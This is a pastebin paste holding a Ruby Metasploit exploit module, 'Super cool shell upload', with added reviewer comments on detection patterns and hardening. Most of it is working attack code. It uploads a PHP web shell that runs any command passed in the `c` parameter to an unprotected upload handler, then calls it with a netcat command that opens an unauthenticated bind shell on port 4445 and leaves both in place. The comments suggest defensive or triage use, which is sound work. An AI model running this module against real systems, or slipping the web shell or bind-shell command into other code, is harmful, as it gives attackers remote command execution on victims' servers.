
super cool msf module

a guest Dec 30th, 2014 300 Never
  1.  
  2. ##
  3. # This module requires Metasploit: http://metasploit.com/download
  4. # Current source: https://github.com/rapid7/metasploit-framework
  5. ##
  6.  
  7. require 'msf/core'
  8.  
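  # Metasploit remote module that posts a PHP file to an `upload/upload.php`
  # form handler and then requests that file back from `upload/foto/`.
  #
  # Review notes (for triage, detection and authorised-test hygiene):
  # - No framework payload is used: `exploit` uploads a fixed PHP snippet and
  #   sends one fixed command, so the 'Platform'/'Arch' metadata below do not
  #   change what goes over the wire.
  # - Msf::Exploit::FileDropper is mixed in, but nothing in this file registers
  #   the uploaded file for cleanup; the file stays on the host until someone
  #   removes it by hand.
  # - The uploaded file executes whatever arrives in its `c` query parameter
  #   without any authentication, and the command sent by `exploit` starts a
  #   listener on TCP 4445. Both stay reachable by anyone who can reach the
  #   host, which is a residual risk for the system under test.
  # - Request patterns visible in this code that a defender can search for:
  #   a multipart POST to `upload/upload.php` with form field `plik` and a
  #   `.php` filename of ten random letters; a GET to `upload/foto/<name>.php`
  #   carrying a `c` parameter; an `nc` process bound to port 4445.
  # - Hardening that defeats this request pattern: validate uploaded file types
  #   server-side and keep the upload directory from executing scripts.
  # - NOTE(review): Msf::HTTP::Wordpress is included, yet no WordPress-specific
  #   helper appears to be called here; confirm whether the mixin is needed.
  class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::HTTP::Wordpress
    include Msf::Exploit::FileDropper

    # Registers the module metadata with the framework.
    #
    # @param info [Hash] metadata passed in by the framework, merged via update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'Super cool shell upload',
        'Description'    => %q{
                This is super cool module for Metasploit to check if you can upload shell on target.
        },
        'Author'         =>
          [
            'HauntIT Blog'     # metasploit module
          ],
        'License'        => MSF_LICENSE,
        'References'     =>
          [
            [ 'URL', 'http://HauntIT.blogspot.com']
          ],
        'Privileged'     => false,
        'Platform'       => ['php'],
        'Arch'           => ARCH_PHP,
        'Targets'        => [ ['Any vulnerable upload ', {}] ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => '28/12/2014'))
    end

    # Probes for the upload handler with a single GET request.
    #
    # A 200 response only shows that `upload/upload.php` exists; it says nothing
    # about whether the handler filters uploads. The original returned
    # CheckCode::Safe in that case, which would report a host as not affected
    # without any evidence, so Detected is returned instead.
    #
    # @return [Msf::Exploit::CheckCode] Unknown when there is no response or a
    #   non-200 status, Detected when the handler answers with 200
    def check
      readurl = normalize_uri(target_uri.path, 'upload','upload.php')
      res = send_request_cgi({
        'uri'    => readurl,
        'method' => 'GET'
      })

      # send_request_cgi returns nil when no response arrives (timeout or
      # connection failure); guard before touching res.code.
      return Msf::Exploit::CheckCode::Unknown if res.nil? || res.code != 200

      Msf::Exploit::CheckCode::Detected
    end

    # Uploads the fixed PHP snippet and then requests it once with a fixed
    # command in the `c` parameter.
    #
    # Fails with Failure::Unreachable when the upload request gets no response,
    # and with Failure::UnexpectedReply when the status is not 200 or the body
    # matches /Blad/.
    def exploit
      payload_name = "#{rand_text_alpha(10)}.php"

      shell = "<?php echo '<pre>';$c=$_GET['c'];shell_exec($c);?>"

      uri = normalize_uri(target_uri.path, 'upload','upload.php')

      # Multipart body with one part: form field "plik", filename = payload_name.
      data = Rex::MIME::Message.new
      data.add_part(shell, 'application/octet-stream', 'binary', "form-data; name=\"plik\"; filename=\"#{payload_name}\"")

      post_data = data.to_s

      payload_uri = normalize_uri(target_uri.path, 'upload','foto', payload_name)

      print_status("#{peer} - Uploading payload to #{payload_uri}")
      res = send_request_cgi({
        'method'   => 'POST',
        'uri'      => uri,
        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
        # NOTE(review): single-quoted, so this value is the literal text
        # #{payload_name}, not the generated name. How the framework combines
        # 'vars_post' with an explicit 'data' body is not visible in this file.
        'vars_post' => { 'plik' => '#{payload_name}' },
        'data'     => post_data
      })

      # A nil response would otherwise raise NoMethodError on res.code.
      if res.nil?
        fail_with(Failure::Unreachable, "#{peer} - No response to upload request")
      elsif res.code != 200 || res.body =~ /Blad/
        # /Blad/ is presumably the application's own error text; confirm against
        # the target application.
        fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
      else
        # Printed on any 200 without the error marker; nothing has been executed
        # or verified at this point.
        print_status("Got shell ;>")
      end

      print_status("#{peer} - Executing payload #{payload_uri}")
      # The response to this request is stored but never inspected, so the
      # module cannot tell whether the command ran. The uploaded file and the
      # port 4445 listener are left in place when the method returns.
      res = send_request_cgi({
        'uri'    => payload_uri,
        'method' => 'GET',
        'vars_get' => {'c' => 'id;nc -lvvp 4445 -e /bin/sh &'}
      })
    end
  end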